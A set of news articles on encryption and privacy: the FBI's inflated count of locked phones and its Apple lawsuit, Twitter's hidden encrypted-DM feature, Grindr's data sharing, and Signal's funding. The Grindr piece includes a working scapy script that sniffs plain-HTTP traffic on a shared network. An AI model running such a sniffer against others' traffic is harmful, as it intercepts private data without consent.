Stamos doesn’t engage with that more nuanced point. He just writes: “It is foolish to expect that FB shareholders are going to subsidize a free text/voice/video global communications network forever. Eventually, WhatsApp is going to need to generate revenue” — thereby collapsing the revenue argument into an all-or-nothing binary without explaining why it has to be that way.

FBI reportedly overestimated inaccessible encrypted phones by thousands

The FBI seems to have been caught fibbing again on the topic of encrypted phones. FBI director Christopher Wray estimated in December that it had almost 7,800 phones from 2017 alone that investigators were unable to access. The real number is likely less than a quarter of that, The Washington Post reports.

Internal records cited by sources put the actual number of encrypted phones at about 1,200, though it could be as many as 2,000, and the FBI told the paper in a statement that “initial assessment is that programming errors resulted in significant over-counting of mobile devices reported.” Supposedly, having three databases tracking the phones led to devices being counted multiple times.

Such a mistake would be so elementary that it’s hard to conceive of how it would be possible. These aren’t court notes, memos or unimportant random pieces of evidence; they’re physical devices with serial numbers and names attached. The idea that no one thought to check for duplicates before giving a number to the director for testimony in Congress suggests either conspiracy or gross incompetence.
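
For scale, the missing check is a few lines of code once device records from the different databases are keyed on serial number. A sketch with invented data:

```python
# Illustrative only: counting unique devices across several case databases
# by serial number. The records and field names are invented for the example.
db_a = [{"serial": "SN-0001", "case": "A-113"},
        {"serial": "SN-0002", "case": "A-221"}]
db_b = [{"serial": "SN-0001", "case": "B-007"}]   # same phone logged again
db_c = [{"serial": "SN-0003", "case": "C-042"}]

all_rows = db_a + db_b + db_c
unique_devices = {row["serial"] for row in all_rows}

print(f"raw rows: {len(all_rows)}")             # 4, the naive (inflated) count
print(f"unique devices: {len(unique_devices)}") # 3, the real count
```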

The latter seems more likely after a report by the Office of the Inspector General that found the FBI had failed to utilize its own resources to access locked phones, instead suing Apple and then hastily withdrawing the case when its basis (a locked phone from a terror attack) was removed. It seems to have chosen to downplay or ignore its own capabilities in order to pursue the narrative that widespread encryption is dangerous without a backdoor for law enforcement.

An audit is underway at the Bureau to figure out just how many phones it actually has that it can’t access, and hopefully how this all happened.

It is unmistakably among the FBI’s goals to emphasize the problem of devices being fully encrypted and inaccessible to authorities, a trend known as “going dark.” That much it has said publicly, and it is a serious problem for law enforcement. But it seems equally unmistakable that the Bureau is happy to be sloppy, deceptive or both in its advancement of a tailored narrative.

Twitter has an unlaunched ‘Secret’ encrypted messages feature

Buried inside Twitter’s Android app is a “Secret conversation” option that, if launched, would allow users to send encrypted direct messages. The feature could make Twitter a better home for sensitive communications that often end up on encrypted messaging apps like Signal, Telegram or WhatsApp.

The encrypted DMs option was first spotted inside the Twitter for Android application package (APK) by Jane Manchun Wong. APKs often contain code for unlaunched features that companies are quietly testing or will soon make available. A Twitter spokesperson declined to comment on the record. It’s unclear how long it might be before Twitter officially launches the feature, but at least we know it’s been built.
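
This kind of find typically starts by decoding the APK and grepping its resources for suggestive strings. A rough sketch of the workflow, assuming `apktool` is on the PATH (the file name and search term below are illustrative):

```python
# Decode an APK's resources and search them for hints of unlaunched features.
# Assumes apktool is installed; "twitter.apk" is a locally pulled APK.
import pathlib
import subprocess

subprocess.run(
    ["apktool", "d", "twitter.apk", "-o", "twitter_out", "-f"], check=True
)

# Scan the decoded string resources for suggestive feature names.
for path in pathlib.Path("twitter_out/res").rglob("strings.xml"):
    for line in path.read_text(encoding="utf-8").splitlines():
        if "secret" in line.lower():
            print(path, line.strip())
```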

The appearance of encrypted DMs comes 18 months after whistleblower Edward Snowden asked Twitter CEO Jack Dorsey for the feature, which Dorsey said was “reasonable and something we’ll think about.”

Twitter has gone from “thinking about” the feature to prototyping it. The screenshot above shows the options to learn more about encrypted messaging, start a secret conversation and view both your own and your conversation partner’s encryption keys to verify a secure connection.

reasonable and something we’ll think about

— jack (@jack) December 14, 2016

Twitter’s DMs have become a powerful way for people to contact strangers without needing their phone number or email address. Whether it’s to send a reporter a scoop, warn someone of a problem, discuss business or just “slide into their DMs” to flirt, Twitter has established one of the most open messaging mediums. But without encryption, those messages are subject to snooping by governments, hackers or Twitter itself.

Twitter has long positioned itself as a facilitator of political discourse and even uprisings. But anyone seriously worried about the consequences of political dissidence, whistleblowing or leaking should be using an app like Signal that offers strong end-to-end encryption. Launching encrypted DMs could win back some of those change-makers and protect those still on Twitter.

Grindr sends HIV status to third parties, and some personal data unencrypted

Hot on the heels of last week’s security issues, dating app Grindr is under fire again for inappropriate sharing of HIV status with third parties (not advertisers, as I had written here before) and inadequate security on other personal data transmission. It’s not a good look for a company that says privacy is paramount.

Norwegian research outfit SINTEF analyzed the app’s traffic and found that HIV status, which users can choose to include in their profile, is included in packets sent to Apptimize and Localytics. Users are not informed that this data is being sent.

These aren’t advertising companies but rather services for testing and improving mobile apps — Grindr isn’t selling them this data or anything. The company’s CTO told BuzzFeed News that “the limited information shared with these platforms is done under strict contractual terms that provide for the highest level of confidentiality, data security, and user privacy.” And to the best of my knowledge regulations like HIPAA don’t prevent the company from transmitting medical data provided voluntarily by users to third parties as specified in the privacy policy.

That said, it’s a rather serious breach of trust that something as private as HIV status is being shared in this way, even if it isn’t being done with any kind of ill intention. The laxity with which this extremely important and private information is handled undermines the message of care and consent that Grindr is careful to cultivate.

Update: Grindr’s head of security told Axios that the company will stop sending HIV status data to third parties.

Perhaps more serious from a systematic standpoint, however, is the unencrypted transmission of a great deal of sensitive data.

The SINTEF researchers found that precise GPS position, gender, age, “tribe” (e.g. bear, daddy), intention (e.g. friends, relationship), ethnicity, relationship status, language and device characteristics are sent over HTTP to a variety of advertising companies. A Grindr representative confirmed that location, age, and tribe are “sometimes” sent unencrypted. I’ve asked for clarification on this.

Not only is this extremely poor security practice, but Grindr appears to have been caught in a lie. The company told me last week when news of another security issue arose that “all information transmitted between a user’s device and our servers is encrypted and communicated in a way that does not reveal your specific location to unknown third parties.”

At the time I asked them about accusations that the app sent some data unencrypted; I never heard back. Fortunately for users, though unfortunately for Grindr, my question was answered by an independent body, and the above statement is evidently false.

It would be one thing to merely share this data with advertisers and other third parties — although it isn’t something many users would choose, presumably they at least consent to it as part of signing up.

But to send this information in the clear presents a material danger to the many gay people around the world who cannot openly identify as such. The details sent unencrypted are potentially enough to identify someone in, say, a coffee shop — and anyone in that coffee shop with a bit of technical knowledge could be monitoring for exactly those details. Identifying incriminating traffic in logs also could be done at the behest of one of the many governments that have outlawed homosexuality.
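
To make the risk concrete: plain-HTTP requests can be read verbatim by anyone on the same network. A minimal passive-capture sketch with the scapy library (needs root; it simply prints the request line of whatever unencrypted traffic it happens to see):

```python
# A minimal sketch of passive HTTP sniffing on a shared network with scapy.
# HTTPS traffic would be opaque ciphertext and never match here; run as root.
from scapy.all import TCP, Raw, sniff

def show_http(pkt):
    payload = bytes(pkt[Raw].load)
    # Plain-HTTP requests start with their method and carry parameters
    # (query strings, form fields) in the clear.
    if payload.startswith((b"GET ", b"POST ")):
        print(payload.split(b"\r\n")[0].decode(errors="replace"))

sniff(
    filter="tcp port 80",
    lfilter=lambda p: p.haslayer(TCP) and p.haslayer(Raw),
    prn=show_http,
    store=False,
)
```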

I’ve reached out to Grindr for comment and expect a statement soon; I’ll update this post as soon as I receive it.

Update: Here is Grindr’s full statement on the sharing of HIV data; notably it does not address the unencrypted transmission of other data.

As a company that serves the LGBTQ community, we understand the sensitivities around HIV status disclosure. Our goal is and always has been to support the health and safety of our users worldwide.

Recently, Grindr’s industry standard use of third party partners including Apptimize and Localytics, two highly-regarded software vendors, to test and validate the way we roll out our platform has drawn concern over the way we share user data.

In an effort to clear any misinformation we feel it necessary to state:

Grindr has never, nor will we ever sell personally identifiable user information – especially information regarding HIV status or last test date – to third parties or advertisers.

As an industry standard practice, Grindr does work with highly-regarded vendors to test and optimize how we roll out our platform. These vendors are under strict contractual terms that provide for the highest level of confidentiality, data security, and user privacy.

When working with these platforms, we restrict information shared except as necessary or appropriate. Sometimes this data may include location data or data from HIV status fields as these are features within Grindr, however, this information is always transmitted securely with encryption, and there are data retention policies in place to further protect our users’ privacy from disclosure.

It’s important to remember that Grindr is a public forum. We give users the option to post information about themselves including HIV status and last test date, and we make it clear in our privacy policy that if you chose to include this information in your profile, the information will also become public. As a result, you should carefully consider what information to include in your profile.

As an industry leader and champion for the LGBTQ community, Grindr recognizes that a person’s HIV status can be highly stigmatized but after consulting several international health organizations and our Grindr For Equality team, Grindr determined with community feedback it would be beneficial for the health and well-being of our community to give users the option to publish, at their discretion, the user’s HIV Status and their Last Tested Date. It is up to each user to determine what, if anything, to share about themselves in their profile.

The inclusion of HIV status information within our platform is always regarded carefully with our users’ privacy in mind, but like any other mobile app company, we too must operate with industry standard practices to help make sure Grindr continues to improve for our community. We assure everyone that we are always examining our processes around privacy, security and data sharing with third parties, and always looking for additional measures that go above and beyond industry best practices to help maintain our users’ right to privacy.

Inquiry finds FBI sued Apple to unlock phone without considering all options

The Office of the Inspector General has issued its report on the circumstances surrounding the FBI’s 2016 lawsuit attempting to force Apple to unlock an iPhone as part of a criminal investigation. While it stops short of saying the FBI was untruthful in its justification of going to court, the report is unsparing of the bureaucracy and clashing political motives that ultimately undermined that justification.

The official narrative, briefly summarized, is that the FBI wanted to get into a locked iPhone allegedly used in the San Bernardino attack in late 2015. Then-director Comey explained on February 9, 2016 that the Bureau did not have the capability to unlock the phone, and that as Apple was refusing to help voluntarily, a lawsuit would be filed compelling it to assist.

But then, a month later, a miracle occurred: a third party had come forward with a working method to unlock the phone and the lawsuit would not be necessary after all.

Though this mooted the court proceedings, which were dropped, it only delayed the inevitable and escalating battle between tech and law enforcement — specifically the “going dark” problem of pervasive encryption. Privacy advocates saw the suit as a transparent (but abortive) attempt to set a precedent greatly expanding the extent to which tech companies would be required to help law enforcement. Apple of course fought tooth and nail.

In 2016 the OIG was contacted by Amy Hess, a former FBI Executive Assistant Director, who basically said that the process wasn’t nearly so clean as the Bureau made it out to be. In the course of its inquiries the Inspector General did find that to be the case: although the FBI’s claims were not technically inaccurate or misleading, they proved simply to be incorrect — and it is implied that they may have been allowed to be incorrect in order to further the “going dark” narrative.

The full report is quite readable (if you can mentally juggle the numerous acronyms), but the findings are essentially as follows.

Although Comey stated on February 9 that the FBI did not have the capability to unlock the phone and would seek legal remedy, the inquiry found that the Bureau had not exhausted all the avenues available to it, including some rather obvious ones.

(Image: Comey at a hearing in 2017)

For instance, one senior engineer was tasked with asking trusted vendors if they had anything that could help — two days after Comey already said the FBI had no options left. Not only that, but there was official friction over whether classified tools generally reserved for national security purposes should be considered for this lesser, though obviously serious, criminal case.

In the first case, it turned out that yes, a vendor did have a solution “90 percent” done, and was happy to finish it up over the next month. How could the director have said that the FBI didn’t have the resources to do this, when it had not even asked its usual outside sources for help?

In the second, it’s still unclear whether there in fact exist classified tools that could have been brought to bear on the device in question. Testimony is conflicting on this point, with some officials saying that there was a “line in the sand” drawn between classified and unclassified tools, and another saying it was just a matter of preference. Regardless, those involved were less than forthcoming even within the Bureau, and even internal leadership was left wondering if there were solutions they hadn’t considered.

Hess, who brought the initial complaint to the OIG, was primarily concerned not that there was confusion in the ranks — it’s a huge organization and communication can be difficult — but that the search for a solution was deliberately allowed to fail in order that the case could act as a precedent advantageous to the FBI and other law enforcement agencies. Comey was known to be very concerned with the “going dark” issue and would likely have pursued such a case with vigor.

So the court case, Hess implied, was the real goal, and the meetings early in 2016 were formalities, nothing more than a paper trail to back up Comey’s statements. When a solution was actually found, because an engineer had taken initiative to ask around, officials hoping for a win in court were dismayed:

She became concerned that the CEAU Chief did not seem to want to find a technical solution, and that perhaps he knew of a solution but remained silent in order to pursue his own agenda of obtaining a favorable court ruling against Apple. According to EAD Hess, the problem with the Farook iPhone encryption was the “poster child” case for the Going Dark challenge.

The CEAU Chief told the OIG that, after the outside vendor came forward, he became frustrated that the case against Apple could no longer go forward, and he vented his frustration to the ROU Chief. He acknowledged that during this conversation between the two, he expressed disappointment that the ROU Chief had engaged an outside vendor to assist with the Farook iPhone, asking the ROU Chief, “Why did you do that for?”

While this doesn’t really imply a pattern of deception, it does suggest a willingness and ability on the part of FBI leadership to manipulate the situation to its advantage. A judge saying the likes of Apple must do everything possible to unlock an iPhone, and all forward ramifications of that, would be a tremendous coup for the Bureau and a major blow to user privacy.

The OIG ultimately recommends that the FBI “improve communication and coordination” so that this type of thing doesn’t happen (and it is reportedly doing so). Ironically, if the FBI had communicated to itself a bit better, the court case likely would have continued under pretenses that only its own leadership would know were false.

Signal expands into the Signal Foundation with $50M from WhatsApp co-founder Brian Acton

Perhaps the most surprising thing I learned about Signal when I spoke with Moxie Marlinspike, the app’s creator, last year at Disrupt was that it was essentially running on a shoestring budget. A tool used by millions and feared by governments worldwide, barely getting by! But $50M from WhatsApp co-founder Brian Acton should help secure the app’s future.
